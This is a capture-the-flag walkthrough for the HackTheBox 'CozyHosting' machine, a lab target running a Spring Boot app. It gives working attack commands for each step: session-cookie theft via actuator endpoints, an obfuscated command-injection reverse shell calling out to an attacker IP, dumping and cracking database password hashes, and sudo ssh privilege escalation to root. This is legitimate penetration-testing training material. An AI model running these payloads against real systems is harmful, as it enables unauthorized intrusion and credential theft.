HackTheBox (CozyHosting)
This walkthrough is for the CozyHosting HackTheBox machine (opens in a new tab) from HackTheBox.
Target
CozyHosting is an Ubuntu system that is hosting a Spring Boot Web Application. In the following demonstration, we are starting the attack with a simple nmap scan to search for any open ports.
The nmap results are the following:
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://cozyhosting.htb Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nothing interesting, lets move forward.
Gobuster scan:
- /index (Status: 200) [Size: 12706]
- /login (Status: 200) [Size: 4431]
- /admin (Status: 401) [Size: 97]
- /logout (Status: 204) [Size: 0]
- /error (Status: 500) [Size: 73] <---
We found the error route which prints a "Whitelabel Error Page", default for Spring Boot Web applications. Therefore, this application is running Spring Boot.
Actuator endpoints in spring boot applications:
Afterwards, we can navigate to /actuators/sessions actuator route in our application and compromise the session cookie of administrator. Using BurpSuite, we can intercept the request and inject the cookie for us to access the admin panel.
In the admin panel, we are presented with the following user interface:
We successfully logged in as K. Anderson our administrator.
At the bottom of the page, 2 input fields are provided which allows administrator to include a host for automatic patching. From a penetration tester perspective, we can use the fields in order to inject a malicious payload and obtain a reverse shell. Afterwards, we can ssh into the machine with credentials.
-
Payload can be injected through the username input field with the BurpSuite program.
Now, we can use the following payload:
echo "bash -i >& /dev/tcp/<your-ip>/<your-port> 0>&1" | base64 -w 0
echo${IFS%??}"<insert payload here>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
*Note: Payload injection can be executed through the input fields without using BurpSuite
-
Then, we start a netcat listener:
nc -nvlp 9001 (any port)
I have chosen 9001 port, the previous payload needs to be modified according to our port.
echo "bash -i >& /dev/tcp/10.10.23.253/9001 0>&1" | base64 -w 0
Optional - create a stable shell with the bash script:
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty raw -echo; fg
Now, we have a stable reverse shell.
- Listing the directory with
ls
, we can find a .tar file.
- Proceed to download the file on your local machine
wget http://<your ip>/<file_name>
- The file is successfully downloaded
- Opening the downloaded file with jd-gui
-
jd-gui <file_name>
-
navigating to classes then templates we can find important application.properties configuration file
-
the file contains postgresql configuration and we can proceed to connect
-
psql -h 127.0.0.1 -U postgres
-
select * from users;
Woola!, we got our user hashes!
We can crack the admin hash using john with rockyou.txt combo list.
-
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
-
using the password, we can ssh into user josh
-
ssh josh@cozyhosting.htb
After successfully connecting as a user josh, we can use privilege escalation to obtain root.
-
sudo -l
-
"User josh may run the following commands on localhost: (root) /usr/bin/ssh"
-
Therefore, we can execute the following GTFOBINS payload to escalate to root :
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2'
-
whoami
-
cat /root/root.txt
-
Pwned.
Payload reference: https://gtfobins.github.io/gtfobins/ssh/#sudo (opens in a new tab)